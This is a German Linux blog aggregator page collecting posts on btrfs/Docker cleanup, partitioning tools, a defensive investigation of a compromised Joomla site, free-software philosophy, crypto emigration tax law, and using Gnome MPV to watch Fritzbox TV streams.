   .w3m        etc   media  root  snap     usr
   bin         home  mnt    run   srv      var
   boot        lib   opt    sbin  sys
$ sudo btrfs subvolume delete /mnt/var/lib/docker/btrfs/subvolumes/4bced6174066e61a9f01bf99e2d80eddb3865b6c3593b35d4609972af90987f5-init/
   Delete subvolume (no-commit): '/mnt/var/lib/docker/btrfs/subvolumes/4bced6174066e61a9f01bf99e2d80eddb3865b6c3593b35d4609972af90987f5-init'

Nachdem ich mit dem Löschen der einzelnen Subvolumes fertig war, habe ich /mnt wieder ausgehangen und das Btrfs-Dateisystem neu ausbalanciert:

$ sudo umount /mnt
$ btrfs balance start -m /
   Done, had to relocate 4 out of 103 chunks
$ sudo btrfs fi df /
   Data, single: total=95.05GiB, used=61.86GiB
   System, single: total=32.00MiB, used=16.00KiB
   Metadata, single: total=1.97GiB, used=1.42GiB
   GlobalReserve, single: total=175.34MiB, used=0.00B

Der disk free Befehl zeigt nach dem Ausbalancieren, dass ich jetzt wieder über 20 GB mehr zur Verfügung habe als vorher. Jetzt muss ich mir nur überlegen, was ich mit Docker und Btrfs zukünftig mache, um mein Btrfs-Volume nicht wieder zu „überfüllen“.

von Christian Imhorst am 02.03.2019 16:49

21.02.2019

Stefan J. Betz (encbladexp)

Das richtige Partitionierungsprogramm

Vor längerer Zeit hatte ich das große Vergnügen mich mit den verschiedenen Linux Partitionierungstools zu beschäftigen. Die getestete Auswahl beschränkte sich dabei auf:

  • GNU Parted
  • fdisk
  • gdisk
Und bevor gefragt wird: Alle Versionen waren auf dem aktuellen Stand, Arch Linux sei Dank. Generell lässt sich die Erkenntnis aus diesem Artikel aber auch auf andere Distributionen oder Versionen übertragen.

Ausgangslage

Es wurden die Daten von einer SSD mit 256GB auf eine mit 250GB kopiert, das Dateisystem wurde vorher natürlich entsprechend verkleinert, sodass alle nützlichen Daten auch zur neuen Plattengröße passen.

Kurzfassung: 

sudo -i
e2fsck -f /dev/sda3
resize2fs /dev/sda3 200G
dd if=/dev/sda of=/dev/sdb
Der naive Ansatz war jetzt einfach die Zielplatte bei der Partitionierung etwas anzupassen, doch hier hatten die unterschiedlichen Partitionierungsprogramme verschiedene Meinungen.

fdisk

Der erste Versuch war fdisk, dieser ging ordentlich in die Hose. Denn bedingt durch GPT wurde nur eine pseudo Partition erkannt, welche die komplette Platte umfasst.

An dieser Stelle möchte ich erwähnen: Das gute alte fdisk ist mittlerweile ein gefährliches Werkzeug geworden, es kann mit GPT Partitionstabellen die man heute (denkt hier an UEFI) oft vorfindet, nicht richtig umgehen. Wer hier an dem was er damit findet, rumspielt gefährdet somit seine Daten. Je nach fdisk Version kann das Ergebnis hier sehr unterschiedlich ausfallen.

Achtung: Auch cfdisk ist hier keine gute Idee, also Finger weg von Tools, die kein GPT kennen oder damit nicht richtig umgehen können.

parted

Auch parted wollte mit der Kopie der Platte nicht wirklich arbeiten, denn natürlich ging die GPT der alten Platte von einer anderen Plattengröße aus. Das brachte parted, welches ja als Allround Tool konzipiert ist, durcheinander.

gdisk

Das, wenn auch altmodische, da sehr fdisk ähnlich, gdisk macht seinen Job wie gewünscht. Unter Angabe der richtigen Zielplatte aufgerufen hat es sofort erkannt, was Sache ist. Konkret passte die GPT-Größe nicht mehr zur Plattengröße und die letzte Partition ragte etwas über das Ende der Platte hinaus.

Beides konnte gut behoben werden, anschließend die Änderungen speichern und alles ist wieder gut.

Fazit

Wer heute partitioniert, will mindestens parted, da dort zumindest (manchmal auch nur theoretisch) die Chance besteht, eine Partitionstabelle unabhängig vom Typ zu bearbeiten. Es fällt nicht sofort bei GPT auf die Nase und ist dank diverser Frontends recht frustrationsfrei benutzbar. Es lohnt sich bei Problemen mit der Partitionierung auch mal einen Blick auf andere Tools zu riskieren, vor allem wenn einem die Ausgabe komisch vorkommt.

Abgesehen davon warnt parted auch sehr brauchbar vor Partition misalignment, was für die Performance gerade bei SSDs sehr hilfreich ist.

Zuletzt gilt das alte Leitmotto: Das richtige Werkzeug für die richtige Arbeit, wer also GPT verwenden möchte, nimmt dafür auch bevorzugt gdisk, das spart Ärger, Zeit und rettet im Zweifelsfall deine Daten ;)

von encbladexp am 21.02.2019 20:04

10.02.2019

Vinzenz Vietzke (vinz)

WordPress und die überdimensionierten Smilies

WordPress hat die lästige Angewohnheit Bild-Smilies im RSS-Feed völlig überdimensioniert anzuzeigen. Das führt zu schwer lesbaren Texten in meinem Feedreader TinyTinyRSS. Ein Beispiel, links das Original und rechts die Anzeige in TTRSS:

Über ein kleines CSS-Schnipsel lässt sich das aber recht leicht lösen. Zumindest bei Blogs die auf wordpress.com oder wordpress.org gehostet sind. Öffne die Einstellungen von TTRSS über Aktionen > Einstellungen und scrolle dort bis Benutzerdefiniertes Stylesheet. Der Button Anpassen öffnet ein kleines Eingabefenster:

Dort fügst du folgenden CSS-Code ein:

img[src*='s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji'] {
width: 14px !important;
vertical-align: middle;
}
img[src*='s.w.org/images/core/emoji'] {
width: 14px !important;
vertical-align: middle;
}

Alternativ kannst du anstatt Breite und Ausrichtung zu setzen die Smilies auch komplett ausblenden:

img[src*='s0.wp.com/wp-content/mu-plugins/wpcom-smileys/twemoji'] {
visibility: none;
}
img[src*='s.w.org/images/core/emoji'] {
visibility: none;
}

Alles nicht schön – aber es funktioniert und ich kann wieder in Ruhe lesen.

von vinzv am 10.02.2019 16:15

11.01.2019

Daniel Gestl (mcdaniels)

ASUSTOR 4002T – 10GBit, 2 Bay NAS

Mein ca. 7 Jahre altes Synology NAS DS213 ist mittlerweile ein wenig in die Jahre gekommen. Ich muss aber auch

von Daniel am 11.01.2019 20:23

09.01.2019

Bernd Dau (whisper)

Mysteriöses Script auf Server

Wegen eines leicht erhöhten Load hat mich nagios informiert. Was macht man da als Admin? Klar, mal gucken, was das denn schon wieder sein könnte....

Ich habe in einem Joomla Web auf meinem Server einen fiesen Burschen eingefangen, der andere Server  angreift.

   21936     1  0 17:13 ?        00:00:01 /usr/bin/perl ./jcache domain.de
   21938     1  0 17:13 ?        00:00:00 /usr/bin/perl ./jcache domain.de
   21940     1  0 17:13 ?        00:00:01 /usr/bin/perl ./jcache domain.de
   21942     1  0 17:13 ?        00:00:01 /usr/bin/perl ./jcache domain.de
   21944     1  0 17:13 ?        00:00:01 /usr/bin/perl ./jcache domain.de
   21946     1  0 17:13 ?        00:00:00 /usr/bin/perl ./jcache domain.de
   21948     1  0 17:13 ?        00:00:00 /usr/bin/perl ./jcache domain.de
   21950     1  3 17:13 ?        00:00:05 /usr/bin/perl ./jcache domain.de
   21952     1  0 17:13 ?        00:00:00 /usr/bin/perl ./jcache domain.de
... insgesamt 18 Prozesse ...

 Das habe ich durch mitlesen der Prozesse durch strace -p Beobachtung herausgefunden.

Abschalten ist kein Problem, es kommt aus dem Joomla.

Wenn ich das Web kurz aktiviere werden die Perl Prozesse innerhalb kurzer (unterschiedlichen Zeiträumen im 1-2 stelligen Minutenbereich) wieder gestartet.

Das Problem ist, dass ich keine manipulierte Datei oder extra Datei im betreffenden Web finden kann. Klar, ich werde ein Backup einspielen, nur ist es schon eigenartig, dass ich keine Spuren finde. Eine Möglichkeit wäre ja, das an der Datei der Datumsstempel manipuliert worden ist. maldet findet auch nichts.

Es wäre gut zu wissen, was ich mir da eingefangen habe. Nach den straces jedenfalls etwas fortgeschrittenes, es liest meine /etc/hosts /etc/resolv.conf und /etc/ssl/certs/ca-certificates.crt aus und greift verschiedene Server auf Port 80 und 443 an um nach Lücken in Wordpress Installationen zu finden.

Allerdings macht mich ein Fund in meinen Traces mißtrauisch .

/var/www/clients/clientN/webMMM/tmp/phpSM2Np7  (deleted);

Möglicherweise wird, nachdem das Script gestart wurde, die Datei auch gleich wieder gelöscht?!

Um den auf die Spur zu kommen, habe ich nun ein kleines Script gebastelt, um das eingespielte Backup zu überwachen, denn das heutige erneute aktivieren des Webs führte nicht zum erneuten aufflammen des jcache Wahnsinns ...

cat ueberwache.sh 
while true; do
    inotifywait -m -e modify,create,delete,move --timefmt '%Y-%m-%d_%H:%M:%S' --format '%T %w %:e %f'  -r /var/www/clients/clientN/webMMM/web >>/root/ueberwachung-webMMM-neu.log

done

Also wirklich dirty Scripting, das könnte man natürlich besser gestalten.

Gestartet habe ich das script mit nohup ./ueberwache.sh&

Danach wurde das zurücksetzte Web dem "Kunden" (Kumpel) übergeben und ich konnte die Funktion schön überprüfen, weil jetzt erstmal alle Addons/Plugins upgedatet bzw deinstalliert wurden.

Ausschnitt:

2019-01-09_20:17:54 /var/www/clients/clientN/webMMM/web/administrator/components/com_jem/views/ DELETE:ISDIR 
2019-01-09_20:17:54 /var/www/clients/clientN/webMMM/web/administrator/components/com_jem/views/imagehandler/ DELETE:ISDIR tmpl
2019-01-09_20:17:54 /var/www/clients/clientN/webMMM/web/administrator/components/com_jem/views/ DELETE:ISDIR imagehandler

Nun ist der erste Tag vorbei und kein erneuter Angriff.

das inotifywait tut aber nicht weh, ich lasse es jetzt einfach mal laufen, wenn dann wieder das, oder was anderes unterwegs ist hilft die Dokumentation und das Log hoffentlich.

von bed (nospam@example.com) am 09.01.2019 19:39

01.01.2019

Bjoern Schiessle (BeS)

Cultural Techniques

CC BY-SA 3.0, via wikimedia/Paulis

These days I looked up the German word “Kulturtechnik” at Wikipedia which translates to “cultural techniques” in English. Surprisingly there is no English Wipipedia article for it, so I have to quote the German one. This section attracted my attention the most:

[Für Kulturtechniken] sind ein oder mehrere Voraussetzungen nötig: das Beherrschen von Lesen, Schreiben und Rechnen, die Fähigkeit zur bildlichen Darstellung, analytische Fähigkeiten, die Anwendung von kulturhistorischem Wissen oder die Vernetzung verschiedener Methoden.

Bei der Entwicklung von Kulturtechniken handelt es sich nicht um Leistungen von Einzelpersonen, sondern um Gruppenleistungen, die in einem soziokulturellen Kontext entstehen. Alle genannten Voraussetzungen benötigen daher immer die soziale Interaktion und gesellschaftliche Teilhabe (Partizipation).

According to this description, cultural techniques are not capabilities of individuals but achievements of a collective, done in a socio-cultural context, it always requires social interaction and participation. This means that reading, writing or math are no culture techniques by itself, but collaborative writing would qualify as such, for example with a wiki or any other collaboration platforms.

Free Software as a cultural technique

When talking about Free Software I argued already in the past that software is a new cultural technique. My arguments typically was along the line that software is everywhere and shapes our world. Software changed the way we live, learn, work, communicate, participate in society and share our culture. I think that’s still true, but this Wikipedia article added an important aspect to me. With the distinction between the tools and what we achieve collectively with it, I think we can argue that software alone is not a cultural technique, but Free Software is.

By definition Free Software is a licensing model for software. A software license that gives the users the freedom to use, study, share and improve the software makes it Free Software. These days Free Software influence all areas of our live. Cars, airplanes, cash terminals, pay machines, the internet, televisions, smart phones, I could continue the list indefinitely, nothing would be possible without Free Software. The freedom given by the license and the influence it has on all areas of our live changed the way we develop software. A new development model was established and is used for most Free Software these days. The most successful Free Software is developed by open communities with a strong focus on collaboration and participation. This model is embraced by individuals and large organizations. According to the 2017 Linux Kernel Report, 4300 developers from over 500 companies have contributed to the kernel, with a impressive list of large companies. Everyone works at the same code, often in parallel. People discuss the changes proposed by each other and improve it together until it is ready to be released. The community is not limited to the code, in a similar collaborative way the corresponding design, documentation, artwork and translations are created. People exchange ideas in online forums, real time chats and meet at conferences. All this happens in a transparent and socio-cultural context, open for everyone to join.

But not only the way Free Software is build, also the usage of the software fits the definition of cultural techniques. From a user perspective, Free Software fosters collaboration and participation in many ways. It can be shared freely so that it encourage collaboration in its area of use. For example pupils can exchange the software they use to do their homework or to prepare their presentation. This teaches a culture of collaboration and make sure that everyone has the same possibilities to participate. Different departments in organizations can exchange software and give it to as much employees as needed without worrying that the maximum number of users, allowed by the license is already exceeded.

In a world defined by software, access to software decides who has access to our culture, to our communication tools, about our possibilities in education and at work. Free Software makes sure that everyone has the same possibilities to participate in today’s society. It fosters collaboration and participation in contrast to proprietary software which divides people and make sure that everyone is on his own.

All this proves to me that Free Software is the latest cultural technique. As such it requires special attention by policy makers and society. I think it is in all our interest to protect and foster this new cultural technique.

von Björn Schießle (bjoern@schiessle.org) am 01.01.2019 22:00

19.12.2018

Sebastian Feltel (feltel)

17 Jahre

Mit dem heutigen Tag ist das, was quasi mal als Zeitvertreib in der Bundeswehr-Stube gestartet war, nun schon siebzehn Jahre durchgängig am laufen. Knapp 1,2 Millionen Beiträge gibt es und fast 39000 Mitglieder, die mal mehr oder minder aktiv das Forum bilden. Das ich debianforum.de nun schon fast zwei Dekaden lang betreiben würde oder es […]

von feltel am 19.12.2018 18:35

09.09.2018

Christian Schmitt (slater)

Wie Kommentiere ich in einer Batchdatei (*.bat Skript) unter Windows

Batch Skripte unter Windows können durchaus sehr umfangreich werden und wenn man nicht extern Dokumentieren kann (oder will) was man da an Code verzapft hat, bietet sich die Möglchkeit das ganze im Code selber zu Dokumentieren (documented by code)

Hier habe ich die drei mir bekannten Möglichkeiten von Kommentaren aufgelistet (funktionieren auch und VBS):

...
REM Dies soll ein Kommentar sein
::Das ist auch ein Kommentar
:: Das ist erstrecht ein Kommentar
...

VBS akzeptiert nur „‚“.

Bei der Version mit „REM“ ist das Leerzeichen nach dem Schlüsselwort „REM“ zwingend erforderlich. Die anderen beiden Versionen mit dem zweifachen Doppelpunkt („::“) werden so direkt als Kommentar erkannt und der Interpreter ignoriert den dahinter gespeicherten Text.

Man kann auch in der gleichen Zeile wo schon ein Befehl steht, direkt hinter dem Befehl Kommentieren

...
REM Einleitender Kommentar
echo irgendwas > Pfad\logdatei.log ::Hier wird ein Log angelegt
call "Pad\tool.bat" :: Hier wird ein anders Batch aufgerufen
::echo "Programm beendet"
...

In diesem Bsp. wird der letzte Befehl nicht mehr ausgeführt (er ist auskommentiert)

Kommentare können sehr hilfreich bei der Fehlersuche sein und sollten daher für jede Programmiersprache, die man nutzt bekannt sein.

von Slater am 09.09.2018 01:35

08.09.2018

Malte Schmidt (maltris)

Vom Versuch, eine verschollene Samsung SSD-Firmware zu erhalten (MMCRE28G5MXP-0VB)

Vor einiger Zeit erhielt ich eine alte SSD aus dem Jahre 2009 zurück. Im Zuge dessen bestellte ich mir bei Amazon einen Ultra Bay 2,5 Zoll Einschub, in der Hoffnung diese alte SSD mit einer Neueren in einem softwarebasierten RAID 1 nutzen zu können.

Bereits vorhanden: SanDisk SDSSDH2128G

  • Laufzeit: 12542 Stunden
  • Verfügbarer reservierter Speicher: 100 %
  • Schreibgeschwindigkeit sequenziell: 123 MB/s
  • Lesegeschwindigkeit sequenziell: 224 MB/s

Zurück erhalten: SAMSUNG MMCRE28G5MXP-0VB

  • Laufzeit: 17619 Stunden
  • Verfügbarer reservierter Speicher: 56 %
  • Schreibgeschwindigkeit sequenziell: 23.8 MB/s
  • Lesegeschwindigkeit sequenziell: 196 MB/s

Oops? Schreibgeschwindigkeit 23.8 MB/s? Ganz richtig. Zu den Abnutzungssymptomen dieser doch recht alten SSD gehört scheinbar eine stark degradierte Schreibgeschwindigkeit. Ein RAID 1 dürfte mir hier mehr Ärger als Nutzen bringen, da die limitierende SSD die Gesamtschreibgeschwindkeit stark beeinflussen würde.

Aus reinem Interesse recherchierte ich Möglichkeiten, die Firmware der alten SSD zu aktualisieren (derzeit VBM1801Q, laut Quellen gibt es jedoch VBM1901Q), um dieser mögliche Performancereserven zu entlocken. Dies jedoch gestaltete sich komplizierter als erwartet.

Anruf 1, Samsung Deutschland, zusammengefasst: Die von Ihnen genannte Seriennummer passt nicht zum Samsung Consumer Seriennummern-Schema. Sind Sie sicher, dass es sich um die korrekte Seriennummer handelt?

Anruf 2, Samsung Deutschland, zusammengefasst: *Seriennummer akzeptiert* – Bitte senden Sie uns ein Foto des Aufklebers an der Unterseite der SSD an folgende Mailadresse, wir antworten dann per Mail.

Mail 1, Samsung Deutschland, kopiert:

Leider aber können wir Ihnen in diesem Fall nicht helfen, weil Sie die B2B / OEM-Model haben. Ihre SSD ist nicht auf unserer Modellist.
Wir unterstützen nur Samsung SSD-Consumer-Produkte wie SSD 830, 840, 850, 750, 950, 960 EVO / PRO
Wenn es möglich ist, kontaktieren Sie bitte direkt bei dem Händler/ Shop wo diese erworben haben.
Wenn dies nicht möglich ist, können Sie sich auch über den folgenden Link an den Samsung-Support für OEM / B2B-Modelle wenden:
Auf der Webseite, setzen Sie Ihre Maus über ‘Support’ in der oberen rechten Ecke und wählen Sie ‘Kontaktieren Sie uns’, um Ihre Anfrage zu senden.

 

Mail 2, Samsung Semiconductor, kopiert:

Please contact the reseller/distributor, from which you´ve purchased that product, to obtain information about firmware releases.
If you have any further questions, please send us more question again or visit our Homepage (http://www.samsung.com/semiconductor).

 

“more question” war hierbei ein Link, der zu einer Webseite führt, welche sich unmittelbar nach Aufruf schließt. Werde ich hier zum Narren gehalten?

<script>
	window.close();
</script>

Scheint so.

Recherchen ergaben noch folgendes, führten jedoch ausschließlich in Sackgassen:

von maltris am 08.09.2018 19:12

12.08.2018

Falk Husemann (josen)

Kostenlos Citrix NetScaler nutzen

In Zukunft wird dieser Blog eine meiner Labor-Anwendungen sein, die ich in meinem privaten Hosting Labor bei Hetzner in Nürnberg selbst hoste. Für ein vernünftiges Hosting-Setup benötigt es natürlich auch einen Loadbalancer. Was läge da näher, als Citrix NetScaler einzusetzen?

Citrix NetScaler VPX Express gibt es außerdem kostenlos.

Welche Einschränkungen gibt es?

  • Das Featureset von NetScaler Standard Edition bis auf Gateway Funktionalität (Datasheet hier)
  • Maximal 20 MBit/sec Durchsatz
  • Maximal 250 SSL Verbindungen

 

Welche Features gibts?

Hier eine kurze Übersicht aus dem verlinkten Datenblatt.

  • L4 load balancing and L7 content switching
  • Microsoft SQL, MYSQL
  • IPv6 support
  • Traffic domains
  • Subscriber-aware traffic steering
  • Global server load balancing (GSLB)
  • Client and server TCP optimizations
  • AppCompress
  • L4 DoS defenses
  • L7 DoS defenses
  • L7 rewrite and responder
  • Multi-path TCP
  • BIC and cubic TCP
  • … und vieles mehr (wie ein SSL VPN

Woher und wie?

Citrix NetScaler VPX Express gibt es hier.

Der Support unterschiedlichster Hypervisoren (KVM für Proxmox, VMWare, Xen und Azure/AWS) ist gegeben.

von fh am 12.08.2018 16:14

30.07.2018

Axel Hellinger (cryptolegal)

Mit Bitcoins ins Steuerparadies | Fußangeln des Auswanderns

Wie geht das mit dem Auswandern, Bitcoins und Steuern. Vorgestellt wurden mir untaugliche DIY-Methoden als auch Angebote windige „Helfer“ aus dem Internet. Hier sind böse Überraschung inklusive.

Wie eigentlich immer kennt man die Antwort: Leider geht so etwas nicht so einfach. Für alle nennenswerten Fälle besteht ohne sinnvolle Gestaltung eine nachgelagerte Besteuerung. Man ist daher idR. noch 10 Jahre steuerpflichtig — § 2 I AStG — und muss schlimmsten Fall bis zu 22 Jahre nach der Auswanderung mit einer Strafverfolgung wegen Steuerhinterziehung rechnen — § 376 I iVm. § 25 EStG –.

[TOC]

Kriterien des § 2 AStG zum Auswandern

Die Kriterien des § 2 AStG sind vereinfacht folgende:

  • Man ist Deutscher und unbeschränkt steuerpflichtig und
  • Man wandert in ein Niedrigsteuerland aus und
  • Das „inländisches“ Vermögen beträgt 30% des Gesamtvermögens oder übersteigt 154.000 EUR.

Erfüllt man alle der 3 Kriterien, ist eine nachgelagerte Besteuerung sehr wahrscheinlich.

§ 2 III Nr. 3 AStG verweist hinsichtlich der Abgrenzung von in- bzw. ausländischem Vermögen auf § 34d EStG:

„… Vermögen, dessen Erträge bei unbeschränkter Einkommensteuerpflicht nicht ausländische Einkünfte im Sinne des § 34d des Einkommensteuergesetzes wären, …“

Nach § 34d Nr. 8 b) EStG sind Einkünfte im Falle von Cryptocurrencies „ausländisch„, wenn

… die veräußerten Wirtschaftsgüter in einem ausländischen Staat belegen sind, …
Das ist ein bisschen Zirkelschluss: Ausländisches Vermögen ist Vermögen, welches ausländische Einkünfte erwirtschaftet. Ausländische Einkünfte liegen vor, wenn das Vermögen im Ausland belegen ist. Im Ergebnis stellt sich also die Frage, sind Coins & Co. im Ausland belegen oder nicht.

Häufig wird in diesem und auch anderen Zusammenhängen eingewandt, dass Cryptocurrencies global seinen und demnach überall belegen sein könnten.

Diese Auffassung stimmt. Jedoch ist im deutschen Steuerrecht als Ausland dasjenige Hoheitsgebiet definiert, das nicht zum deutschen Hoheitsgebiet gehört (arg. § 1 Abs. 1 S. 2 EStG), ohne jedoch hoheitsfrei zu sein. 1

Cryptocurrencies — soweit sie im eigenen Wallet gehalten werden — gehören je nach Auffassung demnach entweder auch zum deutschen Hoheitsgebiet oder sind hoheitsfrei. In beiden Fällen würden keine ausländischen Einkünfte vorliegen und eine inländische Steuerbarkeit vorliegen.

Ob das Vermögen tatsächlich Erträge abwirft, ist unerheblich (Gesetzesformulierung „wäre“), es muss nur dazu in der Lage sein. Dagegen gehören im Privatvermögen befindliche Vermögensgegenstände, mit denen keine laufenden Erträge erwirtschaftet werden (z.B. Kunstgegenstände, Schmuck), nicht zum Vermögen in diesem Sinn. 2 Das „erweiterte Inlandsvermögen“ ist auch nicht gleichzusetzen mit dem Inlandsvermögen i.S.d. § 121 BewG, der Umfang des Vermögens ist aber nach dem BewG zu ermitteln. 3

Cryptocurrencies sind Einkünfte oder auch nicht

Cryptocurrencies können regelmäßig zu Einkünften führen — §§ 22 Nr. 2, 23 I Nr. 2 EStG. Dies ist jedoch nur der Fall, wenn Cryptocurrencies binnen Jahresfrist verkauft werden. In allen anderen Fällen handelt es sich nicht um (inländische) steuerfreie Einkünfte, sondern diese Wertzuwächse stellen keine Einkünfte iSd. Steuerrechts dar.

Daher unterfallen Cryptocurrencies, welche länger als ein Jahr gehalten werden, nicht der Wegzugsbesteuerung.

Gestaltungsstrategien

  • Der einfachste Weg ist erst nach Ablauf der Jahresfrist in Deutschland auszuwandern.
  • Wer dies nicht möchte und auch keine andere Gestaltung anstrebt, sollte die Gewinne einmalig in den Coins in Deutschland realisieren und versteuern.
  • Das Deponieren der Token auf einer ausländischen Börse rechtzeitig vor dem Auswandern.
  • In seltenen Fällen ist es auch möglich, die Coins steuerneutral in ausländisches Betriebsvermögen zu bringen. Das bringt aber weitere Komplikationen mit sich.
  • Ebenfalls kann die konkrete Wahl eines Niedrigsteuerlandes erheblichen Einfluss auf die Wegzugssteuer haben. Es sollte daher überlegt werden, ob z.B. eine Zwischenstation in einem Drittland lohnenswert ist.

Notes:

  1. Gosch, Kirchof EStG, 17. Aufl. 2018, § 34d EStG, Rn. 4, vgl. BFH v. 14.6.1991 – VI R 185/87, BStBl. II 1991, 926.
  2. Schütz, AStG – eKommentar, § 2 Einkommensteuer (Fassung vom 01.01.2015)
  3. Zimmermann/Könemann in S/K/K, § 2 AStG Rz. 142, April 2015.

HELLINGER.legal - Steuern | Recht | Cryptos

von support am 30.07.2018 13:54

17.07.2018

Nico Hartung (xyznico)

Update für Unterputz-Module – Devolo Plugin für Homebridge – Apple HomeKit

linux debian homebridge devolo - Update für Unterputz-Module - Devolo Plugin für Homebridge - Apple HomeKit

von _nico am 17.07.2018 06:19

29.05.2018

Christoph Langner (Chrissss)

Fritzbox TV mit Gnome MPV als Alternative zu VLC nutzen

Gnome MPV als schlanke Alternative zu VLC zum Abspielen der TV-Streams der Fritzbox.

Mit den Fritzbox-Kabelroutern von AVM oder alternativ auch dem Fritz!WLAN Repeater DVB‑C als Zusatzgerät zu einem anderen WLAN-Router kann man recht einfach das Fernsehsignal in sein heimisches Netzwerk streamen. Als „Empfänger“ dienen Android- oder iOS-Geräte per App oder alternativ ein Desktop-PC oder Notebook. Auf Computern braucht es keine besondere Software, der Medienplayer VLC genügt. Der Vorteil: VLC gibt es für Linux, MacOS X sowie Windows. Der Nachteil: Die Bedienung (beispielsweise das Zappen von Sender zu Sender) ist ein wenig umständlich.

Ich für meinen Teil wünsche mir hingegen ein absolut simples TV-Programm: Ein Hauptfenster mit dem Fernsehbild. Eine Seitenleiste mit allen Kanälen. Per Doppelklick in das Bild wechselt man zwischen dem Fenstermodus und Vollbild — Mehr braucht es in der Regel nicht. VLC erfüllt diese Anforderung mehr oder weniger, bietet aber auch zig Funktionen, die beim Fernsehen brach liegen. Der Medienplayer Gnome MPV lässt sich hingegen mit wenigen Tricks in eine eigenständige TV-App für die Fritzbox verwandeln, die eben jene Anforderungen perfekt umsetzt.

Installation von Gnome MPV

Ein fertig gebautes Gnome MPV findet man inzwischen eigentlich immer in den Paketquellen, sofern man eine halbwegs aktuelle Linux-Distribution am Laufen hat. Alternativ liefert die Homepage des Projekts auch Hinweise für optionale Paketquellen für die gerade neueste Version, zudem gibt es auch ein Flatpak-Paket. In der Regel sollte es allerdings genügen die Version aus den Paketquellen der eingesetzten Distribution zu installieren.

### Installation unter Arch Linux
$ pacman -Ss gnome mpv
community/gnome-mpv 0.14-2
    Simple GTK+ frontend for mpv
$ sudo pacman -S gnome-mpv
### Installation unter Ubuntu
$ sudo apt search gnome mpv
Sortierung... Fertig
Volltextsuche... Fertig
gnome-mpv/testing 0.13-1 amd64
  simple GTK+ frontend for mpv
$ sudo apt install gnome-mpv

Nach der Installation kann man das Programm über den Eintrag Gnome MPV aus dem Anwendungsmenü heraus laden. Alternativ startet man das MPV-Backend des Players über das Kommando mpv einfach über ein Terminal. Diese Trennung zwischen GUI und Player kommt uns nachher gelegen, um Probleme beim Empfang des TV-Video-Streams der Fritzbox zu analyiseren.

MPV zum Fritzbox-Empfang überreden

Um das Fernsehsignal der Fritzbox aufzugreifen, braucht man die Senderliste im M3U-Format einer Playlist. Im Menü der Fritzbox öffnet man dazu DVB-C | Senderliste und lädt sich die Datei mit einem Klick auf Senderliste erzeugen auf die Festplatte. In VLC geöffnet, kann man über die Datei nun sofort die Sender streamen. Gnome MPV hingegen meldet beim Öffnen der M3U-Datei für jeden Sender einmal: Playback was terminated abnormally. Reason: unrecognized file format. was zu ein wenig Chaos auf dem Desktop führt.

Die von der Fritzbox ausgelieferte Senderliste.

Holt man sich die URL zu einem der Sender aus der M3U-Datei und versucht ihn mit der Kommandozeilenvariante des MPV-Players zu öffnen, erhält man eine ähnliche Nachricht (Ihr müsst diesen Schritt hier nicht nachvollziehen, er soll nur erklären, wie man auf die Lösung des Problems kommt.)

$ mpv "rtsp://192.168.188.82:554/?freq=314&bw=8&msys=dvbc&mtype=256qam&sr=6900&specinv=0&pids=0,16,17,18,20,100,101,84,102,103,104,105,106,1176,2070,2171"
Playing: rtsp://192.168.188.82:554/?freq=314&bw=8&msys=dvbc&mtype=256qam&sr=6900&specinv=0&pids=0,16,17,18,20,100,101,84,102,103,104,105,106,1176,2070,2171
[ffmpeg/demuxer] rtsp: CSeq 3 expected, 0 received.
[ffmpeg/demuxer] rtsp: method SETUP failed: 461 Unkown
[lavf] avformat_open_input() failed
Failed to recognize file format.

Mit dieser Ausgabe kann man nun allerdings ein wenig mehr anfangen, sodass man im Github-Forum des Players auf den Eintrag rtsp error 461 with freebox stream stößt. Die Lösung: Hängt man dem Aufruf die Option --rtsp-transport=udp an, öffnet MPV brav den Fernseh-Stream der Fritzbox.

$ mpv "rtsp://192.168.188.82:554/?freq=314&bw=8&msys=dvbc&mtype=256qam&sr=6900&specinv=0&pids=0,16,17,18,20,100,101,84,102,103,104,105,106,1176,2070,2171" --rtsp-transport=udp
Playing: rtsp://192.168.188.82:554/?freq=314&bw=8&msys=dvbc&mtype=256qam&sr=6900&specinv=0&pids=0,16,17,18,20,100,101,84,102,103,104,105,106,1176,2070,2171
[ffmpeg/video] mpeg2video: Invalid frame dimensions 0x0.
[...]
[ffmpeg/video] mpeg2video: Invalid frame dimensions 0x0.
[ffmpeg/demuxer] rtsp: Could not find codec parameters for stream 7 (Unknown: none ([12][0][0][0] / 0x000C)): unknown codec
[...]
AO: [pulse] 48000Hz stereo 2ch s16
VO: [gpu] 720x576 => 1024x576 yuv420p
AV: 00:00:08 / 00:00:13 (64%) A-V:  0.000 Cache:  4s+3MB
MPV öffnet mit den richtigen Einstellungen den TV-Stream der Fritzbox.

Gnome MPV als TV-App auf dem Desktop

Die Option kann man nun auch Gnome MPV mit auf dem Weg geben. Für noch mehr Komfort würde ich jedoch den Medienplayer gleich als TV-App im System fest verankern. Dazu lädt man sich von Google Play das Icon der Fritz-TV-App herunter und schiebt die Bilddatei nach ~/.local/share/icons ins eigene Home-Verzeichnis. Anschließend erstellt man die Datei ~/.local/share/applications/fritztv.desktop mit dem Inhalt aus dem folgenden Listing (aus der zweiten Listing-Box).

$ wget https://lh3.googleusercontent.com/P1hF9zUmQCU2JKtDu62at59m5Mgzdm03T_IhMovYemy43a0zQdso5J5Dfm2opHpN7w=s800 -O ~/.local/share/icons/avm-fritz-tv.png
$ gedit ~/.local/share/applications/fritztv.desktop

[Desktop Entry]
Type=Application
Name=Fritz TV
GenericName=TV Player for Fritz.Repeater
Comment=Play tv over network
Icon=avm-fritz-tv.png
Exec=gnome-mpv /home/benutzername/TV/tvsd.m3u --rtsp-transport=udp --deinterlace
Terminal=false
Categories=AudioVideo;Audio;Video;Player;TV;
X-KDE-Protocols=ftp,http,https,mms,rtmp,rtsp,sftp,smb

Beachtet bitte, dass in der Zeile Exec=[...] der vollständige Pfad zur M3U-Datei und der korrekte Dateiname stehen muss, passt die Zeile daher noch an eure Situation an. Ich persönlich hab die M3U-Dateien in einem Unterordner in meinen Home-Verzeichnis liegen. Der Zusatz --deinterlace sorgt neben der schon erklärten Option --rtsp-transport=udp für ein besseres Bild. Nach dem Speichern sollte nun ein zusätzlicher Eintrag mit dem Namen Fritz TV in eurem Anwendungsmenü auftauchen. Ein Klick auf das Icon lädt Gnome MPV mit allen von der Fritzbox angebotenen TV-Sendern und den passenden Einstellungen.

Gnome MPV als eigenständige Fritzbox-TV-App im Anwendungsmenü.
Mit den passenden Einstellungen spielt auch MPV und damit Gnome MPV den TV-Stream der Fritzbox ab.

